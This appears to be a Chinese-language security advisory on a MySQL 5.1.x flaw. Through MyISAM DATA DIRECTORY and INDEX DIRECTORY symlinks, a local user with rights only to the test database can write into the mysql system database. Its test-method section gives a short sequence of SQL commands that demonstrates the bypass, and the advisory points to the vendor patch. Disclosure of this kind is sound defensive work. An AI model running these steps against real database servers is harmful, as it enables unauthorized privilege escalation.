受影响系统:
MySQL AB MySQL 5.1.x
不受影响系统:
MySQL AB MySQL 5.1.41
描述:
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
MySQL允许本地用户通过对MyISAM表调用CREATE TABLE绕过某些权限检查。在通过以下方式创建MyISAM表时:
CREATE TABLE ( ) DATA DIRECTORY … INDEX DIRECTORY …
由于没有特别的检查确保已有的表格不会被符号链接覆盖,用户可以在test数据库中创建user表格,DATA DIRECTORY指向mysql数据库。这个漏洞与mysql_unpacked_real_data_home值的错误计算方式有关。
<*来源:Sergei Golubchik
链接:http://bugs.mysql.com/bug.php?id=32167
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
root> grant all privileges on test.* to test@localhost;
test> create table t1 (a int) data directory ‘/MySQL/var/mysql’, index directory
‘/MySQL/var/mysql’;
root> flush tables;
root> create table t1 (a int);
root> insert t1 values (1),(2),(3);
root> flush tables;
test> select * from t1;
建议:
厂商补丁:
MySQL AB
——–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
0 条评论。